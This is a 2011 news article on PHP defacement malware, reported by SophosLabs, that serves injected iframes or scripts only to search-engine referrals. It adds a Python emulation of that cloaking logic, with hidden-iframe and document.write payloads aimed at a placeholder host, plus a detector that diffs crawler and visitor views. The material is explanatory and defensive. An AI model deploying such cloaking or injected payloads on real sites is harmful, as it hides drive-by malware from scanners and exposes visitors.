UPDATED 11:37 EDT / OCTOBER 21 2011

NEWS

New PHP Web Defacement Malware Caught Wearing Camouflage

Web defacement occurs when an intruder alters a Web page without authorization, inserting or substituting content of the intruder's choosing (often provocative or offensive). The defacement of an organization's site exposes visitors to misleading or malicious content until the compromise is discovered and cleaned up.

Fraser Howard and fellow researchers at SophosLabs have discovered a new attack technique against Web sites. Malicious PHP code was inserted into the front pages of compromised Web servers; it examines how each visitor arrived (for example, whether they reached the site by clicking a search-engine result) and, on that basis, injects <IFRAME> or script elements into the header of the page that is served.

How it works

Google and other search engines actively check the destinations of their own links for malicious content. The injected PHP code turns this against them: only a visitor who arrives by clicking a search-engine link is handed off to the malicious redirection. At that point the code gathers some additional information about the visitor and serves the defaced page, while the search engine's own scanners, which do not arrive that way, see a clean page. The result is that the search engine cannot tell whether any defacement is going on.

“The incident raises some interesting questions,” said Howard. “Most notably the malicious content being injected into the Web pages was changing over time (sometimes a straight iframe, sometimes JavaScript). This is not what you necessarily expect for hacked sites; ordinarily, pages are injected with a fixed string (for example an iframe redirect or a script). Instead, the injected content may take one of many forms, sometimes triggering a variety of detections from anti-virus.”
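To make the cloaking concrete, the following is an added example written for this page; it is not Sophos' code and not the malware sample. It emulates in Python the decision logic described above, serving the injected iframe or script only to visitors who arrive from a search engine and rotating the payload between an iframe and JavaScript as Howard notes, and it shows the differential check a site owner can run: fetch the same page as a crawler, as a direct visitor and as a search-engine referral, then diff the active elements. All HTML, the malicious.example host, the header profiles and the function names are constructed for illustration.

```python
"""Added example: referer-keyed injection and the differential fetch that
exposes it. Everything here (page, hostnames, payloads, profiles) is
constructed for illustration; none of it comes from the Sophos sample."""
import re
from typing import Callable, Dict, List, Sequence, Tuple

# Constructed clean page served by the (emulated) infected site.
CLEAN_PAGE = ("<html><head><title>Example Corp</title></head>"
              "<body><h1>Welcome</h1></body></html>")

SEARCH_ENGINES = ("google.", "bing.", "yahoo.")
CRAWLER_UAS = ("googlebot", "bingbot", "slurp")

# Two constructed payload shapes: a hidden iframe and a script that writes
# the same iframe, mirroring the "sometimes iframe, sometimes JavaScript"
# rotation quoted above. The host malicious.example is a placeholder.
INJECTIONS = (
    '<iframe src="http://malicious.example/in.php" width="1" height="1" '
    'style="visibility:hidden"></iframe>',
    '<script>document.write(unescape("%3Ciframe src=%22http://malicious.example'
    '/in.php%22 width=%221%22 height=%221%22%3E%3C/iframe%3E"))</script>',
)


def infected_handler(headers: Dict[str, str], request_no: int = 0) -> str:
    """Emulates the server-side cloaking logic: crawlers and direct visitors get
    CLEAN_PAGE; only a visitor whose Referer is a search engine gets the
    injected header element, and the payload alternates per request."""
    referer = headers.get("Referer", "").lower()
    ua = headers.get("User-Agent", "").lower()
    is_crawler = any(bot in ua for bot in CRAWLER_UAS)
    from_search = any(engine in referer for engine in SEARCH_ENGINES)
    if is_crawler or not from_search:
        return CLEAN_PAGE
    payload = INJECTIONS[request_no % len(INJECTIONS)]
    return CLEAN_PAGE.replace("</head>", payload + "</head>")


# Matches complete <iframe> and <script> elements, the "active" content a
# defacement of this kind adds.
TAG_RE = re.compile(r"<(iframe|script)\b[^>]*>.*?</\1>", re.I | re.S)


def active_elements(html: str) -> List[str]:
    """Return every iframe/script element in the document, in order."""
    return [m.group(0) for m in TAG_RE.finditer(html)]


Profile = Tuple[str, Dict[str, str]]


def cloaking_check(fetch: Callable[[Dict[str, str]], str],
                   profiles: Sequence[Profile]) -> Dict[str, List[str]]:
    """Fetch the page once per request profile and report active elements that
    appear under a profile but not under the baseline (the first profile).
    A non-empty result means the site serves different active content
    depending on who is asking, i.e. it is cloaking."""
    baseline = set(active_elements(fetch(profiles[0][1])))
    findings: Dict[str, List[str]] = {}
    for name, headers in profiles[1:]:
        extra = [e for e in active_elements(fetch(headers)) if e not in baseline]
        if extra:
            findings[name] = extra
    return findings


# The baseline is the crawler's view, because that is the view the search
# engine's scanner gets; the other profiles are what humans send.
PROFILES: List[Profile] = [
    ("crawler", {"User-Agent": "Googlebot/2.1"}),
    ("direct", {"User-Agent": "Mozilla/5.0"}),
    ("from-google", {"User-Agent": "Mozilla/5.0",
                     "Referer": "https://www.google.com/search?q=example+corp"}),
]


def http_fetcher(url: str) -> Callable[[Dict[str, str]], str]:
    """Real fetch(headers) for use against a site you are authorized to test.
    Not exercised offline."""
    import urllib.request

    def fetch(headers: Dict[str, str]) -> str:
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return fetch


def run_demo() -> Dict[str, List[str]]:
    """Run the differential check against the emulated infected server."""
    counter = {"n": 0}

    def fetch(headers: Dict[str, str]) -> str:
        counter["n"] += 1
        return infected_handler(headers, counter["n"])
    return cloaking_check(fetch, PROFILES)


if __name__ == "__main__":
    for profile, elems in run_demo().items():
        print(profile, "sees extra active content:", elems)
```

`run_demo()` exercises the check against the emulated server; `cloaking_check(http_fetcher(url), PROFILES)` runs it against a live site. The caveat is that the check only catches cloaking keyed on the headers you vary: code that also keys on source address, cookies or time of day needs more profiles, and because the payload rotates, two human-profile fetches can differ from each other without either matching the crawler view, which is why the crawler fetch is the baseline rather than any single human fetch.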

Anti-Malware Monitoring

Search engines and Web servers run anti-malware monitoring to check the behavior of Web transactions. Google, for example, uses a notification system on its search engine that detects when a user's search traffic is being intercepted; if it concludes that the user's computer is infected with malware, it displays a large warning at the top of the results page.

Microsoft is working with the FBI, Internet service providers and software vendors to detect specific malware, warn the users affected by it, and reduce spam and malware attacks to a minimum.

HackANGLE

Web defacement is a significant threat to businesses building an online presence. Defacement and redirection are common tactics of Anonymous and similar outfits, but this is more likely the work of malware that spreads by infecting Web sites and the computers of their visitors. A conventional defacement is designed to show visitors something other than the real page; self-propagating malware, by contrast, wants to stay unnoticed and spread. Google and other search engines scan for malware, so hiding from them is the next logical step for such malware.

Existing security products provide only a partial solution: in most cases the altered pages are exposed to external users before the attack is detected, and recovery takes significant time, effort and money.

Protection requires an effective, multi-layered solution that prevents defacement before altered pages reach the public. One approach is system-call and API interception, which monitors activity at the request level and can stop the change before any damage occurs, in the spirit of Jiang's published analysis of the rogue code codenamed Plankton, which was found in apps on the Android Market.

